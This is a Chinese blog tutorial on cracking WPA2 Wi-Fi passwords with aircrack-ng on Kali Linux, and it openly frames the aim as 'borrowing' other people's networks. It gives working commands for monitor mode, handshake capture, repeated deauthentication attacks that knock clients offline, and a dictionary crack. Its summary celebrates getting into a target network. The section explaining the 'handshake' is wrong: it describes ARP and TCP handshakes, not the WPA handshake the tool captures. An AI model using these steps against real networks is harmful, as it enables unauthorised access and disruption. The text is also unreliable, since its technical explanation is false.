kali使用aircrack-ng对WiFi进行爆破

---

前言

在数字时代的今天，无线网络已经成为了我们生活中不可或缺的一部分。无论是在家中轻松冲浪，还是在咖啡馆享受一杯美味的咖啡时，无线网络都带给我们便利和舒适。然而，网络的这片宽广天地是否真的安全呢？

或许你曾经陷入过这种困境：身边环绕着无数Wi-Fi信号，却无法连接到任何一个。痛苦的时刻总是伴随着一声无奈的叹息，这时候，是不是有一种念头在你的脑海中闪现，想要……"借用"一下别人的Wi-Fi？

别急！在这里，我们将一起进入一个刺激又有趣的世界。我们将用Kali Linux操作系统配合强大的aircrack-ng工具，来解开Wi-Fi密码的谜题。你会发现，这个过程就像是漫游在黑客的世界中，拥有了不可思议的能力。

但是，请记住，我们的目的是为了学习和提高对网络安全的认识。以良好的道德底线作为指导，我们要对这些技术保持尊重和谨慎。在你开始探索这个令人着迷的领域之前，请确保你已经获得了授权，并且只在合法的范围内进行操作。

现在，戴上你的黑客帽子和面具，准备好迎接刺激的挑战吧！让我们一起探索无线网络的神秘世界，解密Wi-Fi密码背后的秘密，同时也提醒自己保护好自己的网络安全。让我们开始这段有趣而又充满挑战的旅程吧！

---

一、What is aircrack-ng

当谈到网络安全和密码破解工具时，aircrack-ng是一个备受称赞的工具。它可以帮助你测试和保护你的无线网络，或者在合法的授权下，检测和弱点，并确保你的网络安全无虞。

你可以把aircrack-ng看作是网络世界的一位侦探，它可以在茫茫无际的无线网络中，帮你解开密码的谜团。它是一种灵活而强大的工具，包含多个模块，每个模块都有自己的功能。总的来说，aircrack-ng是一种多功能、全能型的密码破解利器。

首先，aircrack-ng拥有一个强大的无线网络嗅探器，它可以通过监听无线信号来捕捉数据包。就像是一个无线信号的捕鼠器，它可以抓住飞快穿过空气的数据包，并将它们保存下来，供你进一步分析。

接下来，aircrack-ng有一个密码捕捉模块，它可以帮助你提取Wi-Fi网络的加密数据包。就像是你使劲地摇晃密码锁，直到它解开并揭示出隐藏的密码。

然后，aircrack-ng还有一个密码破解模块，它可以使用字典攻击和暴力破解等技术，尝试各种可能性来解开密码。它像是一个不知疲倦的密码大师，用各种组合和方式不断尝试，直到找到正确的密码。

最后，aircrack-ng还有一个网络分析器模块，它可以帮助你分析和评估无线网络的安全性。它就像是一个网络安全顾问，通过深入分析网络的各个方面，帮你发现潜在的安全隐患，并提供相应的建议和措施来保护你的网络。

总而言之，aircrack-ng是一个让你深入了解无线网络并保护它的强大工具。它像是你的网络保镖，始终守护在你的身边，确保你的无线网络安全无虞。无论是想测试你的网络安全性，还是希望保护你的无线网络，aircrack-ng都可以帮你实现这些目标，带你进入一个有趣又深奥的网络安全世界。

二、食用教程

1.自备无线网卡

需要支持Monitor模式，就是监听模式。

2.什么是握手包

握手包（Handshake Packet）是在计算机网络中用于建立连接的一种数据包。在TCP/IP协议中，握手包通常指的是以太网中的ARP协议或互联网中的TCP协议中的握手过程。

在以太网中，当一个设备需要与另一个设备进行通信时，它需要发送一个ARP请求握手包到本地局域网中。该握手包中包含源设备的MAC地址和目标设备的IP地址，以及一些其他的控制信息。目标设备接收到握手包后，会发送一个ARP回应握手包回到源设备，其中包含源设备的IP地址和MAC地址。这样，源设备就知道了目标设备的IP地址对应的MAC地址，从而可以进行通信。

在互联网中，TCP协议使用三次握手的方式建立连接。首先，客户端发送一个SYN握手包给服务器端，该握手包中包含客户端的初始序列号和一些其他的控制信息。服务器端接收到该握手包后，发送一个SYN+ACK握手包给客户端，其中包含服务器端的初始序列号和一些其他的控制信息。最后，客户端发送一个ACK握手包给服务器端，其中包含客户端的确认序列号。这样，客户端和服务器端就成功地完成了连接的建立。

握手包在计算机网络中起着非常重要的作用，它能够确保通信双方能够正确地建立连接并进行数据交换。

3.开始

插入网卡，输入:ip addr或iwconfig来查看网卡是否接入成功

4.启动监听模式

airmon-ng start wlan0

开启监听模式，运行之后是这样的。

输入iwconfig查看监听模式启动成功没有。

5.扫描wifi

输入airodump-ng wlan0mon扫描周围有没有wifi

上面参数含义：

1. bssid：为目标的mac地址

2. pwr：信号的质量，小于-65，就越差，大于-65就越强

3. CH：信道

4. ENC：加密方式，可以看到，都是wpa2的

5. essid：wifi的名称

6. Beacons：连接数量

7. MB：网速，数值越大越好

6.抓包

airodump-ng --bssid 30:42:40:95:4E:78 -c 4 -w HY  wlan0mon

-c是信道号，-w是抓到的数据包保存的文件中，输出

已经开始抓握手包(吐槽一下，这一步是要等的，等到什么时候呢？等到上厕所或手机重启，才能抓到包，没有耐心的等待的继续往下看)

7.断网

输入：

语法：

aireplay-ng -0 2 -c [STATION] -a [BSSID] wlan0mon

及

aireplay-ng -0 2 -c B2:98:F8:B2:F0:13 -a 30:42:40:95:4E:78 wlan0mon

-0 是death模式，2为发送次数，改0为无限发送
-c客户端mac地址
-a是wifi mac地址

出现handshake就代表抓包成功了。

8.破解

aircrack-ng -w [wifi密码路径] [数据包路径]

9.完成

---

总结

在kali使用aircrack-ng对WiFi进行爆破这个任务中，我真的有过一次令人难以置信的经历！这就像是进入了一个黑客电影的世界，我感觉自己就是那个聪明绝顶的黑客主角。

首先，我需要找到一个目标网络，这可不是一件容易的事情。我打开aircrack-ng工具，它就像是我的神奇导航仪，带我找到了一个看起来很有潜力的WiFi网络。我兴奋不已，开始了我的冒险之旅。

接下来的步骤就是收集数据包，这听起来很无聊，但却是决定爆破成功与否的关键。我启动了监控模式，飞速捕获了大量的数据包。像是在观察一个蓬勃发展的城市一样，我看着数据包的数量不断增加，感到自己就是一个神奇的观察者。

收集完数据包后，我开始进行破解。这就像是在解谜一样，我需要找到正确的密码组合。aircrack-ng像是一个无声的顾问，给我提供了各种工具和技巧。我尝试了各种不同的密码字典和破解方法，有时候成功了，有时候又失败了，但每一次尝试都让我更加接近目标。

最终，在我几乎要放弃的时候，我找到了一个奇迹般的密码组合。这一刻就像是黑客电影中的高潮部分，我感到自己掌握着无穷的力量，成功地进入了目标网络。

总而言之，我学到了很多新的技术和工具，也体验到了黑客的世界。这对我来说是一次难忘的冒险